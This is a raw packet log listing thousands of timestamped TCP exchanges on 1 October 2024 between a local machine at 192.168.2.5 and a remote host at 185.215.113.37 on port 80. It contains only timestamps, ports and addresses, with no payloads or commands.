Oct 1, 2024 16:50:06.540019989 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.540074110 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586407900 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586467028 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586479902 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586525917 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586539030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586541891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586541891 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586549997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586560011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586572886 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586575985 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586591005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586601019 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586611986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586622953 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586632013 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586632013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586632013 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586642981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586652994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.586661100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586673021 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586700916 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.586980104 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587042093 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587053061 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587066889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587085962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587090015 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587096930 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587107897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587117910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587136984 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587156057 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587202072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587230921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587240934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587250948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587260962 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587277889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587289095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587290049 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587300062 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587310076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587321043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587321043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587327957 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587340117 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587349892 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587359905 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587362051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587362051 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587372065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587392092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587402105 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587403059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587403059 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587415934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587424040 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587436914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587452888 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587471008 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587479115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587479115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587482929 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587491989 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587502003 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587507010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587512970 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587522030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587532043 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587538958 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587548971 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587558031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587568045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587569952 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587580919 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587590933 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587591887 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587603092 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587613106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587620974 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587625027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587640047 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587644100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587661982 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587680101 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587824106 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587836027 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587845087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587855101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587865114 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587876081 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587886095 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587896109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587897062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587897062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587907076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.587913990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.587960005 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625312090 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625333071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625344038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625412941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625422955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625432014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625442982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625464916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625475883 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625485897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625494003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625494003 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625526905 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625535011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625540018 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625545979 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625556946 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625571966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625586987 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.625600100 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625632048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.625632048 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626485109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626494884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626507998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626575947 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626585960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626595020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626605988 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626606941 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626635075 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626725912 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626830101 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626882076 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626888990 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626893044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626943111 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.626949072 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626959085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626970053 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626981020 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.626990080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627006054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.627016068 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.627060890 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.627067089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627077103 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627088070 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627098083 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627109051 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627116919 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.627118111 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627129078 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.627151012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.627198935 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628439903 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628452063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628463984 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628511906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628511906 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628535986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628546000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628556967 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628566980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628576994 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628592014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628631115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628631115 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628662109 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628674030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628684044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628694057 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628704071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628712893 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628724098 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628735065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.628748894 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628750086 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628763914 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.628778934 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675107002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675129890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675142050 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675152063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675163031 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675173044 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675189018 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675199986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675215960 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675225973 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675235033 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675246000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675256014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675266981 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675313950 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675401926 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675435066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675467014 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675502062 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675585985 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675595999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675606012 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675616980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675626993 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675643921 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675643921 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675653934 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675667048 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675669909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675678015 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675688982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675698996 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675704002 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675724030 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675725937 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675731897 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675734997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675740004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675745010 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675781012 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675802946 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675869942 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675879955 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675890923 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675901890 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675916910 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675925970 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675928116 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675945997 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675956011 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675965071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675967932 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.675976038 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675987005 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.675996065 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676001072 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676007032 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676016092 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676021099 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676032066 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676042080 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676050901 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676052094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676052094 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676074982 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676084995 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676091909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676091909 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676095963 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676105976 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676131964 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676152945 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676203966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676213980 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676229000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676238060 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676248074 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676258087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676266909 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676269054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676269054 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676276922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676287889 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676287889 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676316023 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676337004 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676347017 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676371098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676371098 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676383972 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676394939 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676397085 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676436901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676436901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.676474094 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676482916 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.676548958 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.713973999 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.714025021 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.714035034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.714046001 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.714056969 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.714107037 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.714148045 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.752203941 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.757128000 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970217943 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970242023 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970257998 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970344067 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970381975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970429897 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970464945 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970479965 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970498085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970511913 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970515966 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970534086 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970537901 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970550060 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970551014 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970570087 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970609903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970609903 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970709085 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970722914 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970741034 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970777035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970777035 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970796108 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970817089 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970833063 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970858097 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970874071 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970879078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970879078 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970897913 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970907927 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970912933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970912933 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970916986 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970944881 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970958948 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970974922 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.970978975 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.970992088 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.971000910 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.971016884 CEST	80	49704	185.215.113.37	192.168.2.5
Oct 1, 2024 16:50:06.971033096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.971033096 CEST	49704	80	192.168.2.5	185.215.113.37
Oct 1, 2024 16:50:06.971035004 CEST	80	49704	185.215.113.37	192.168.2.5
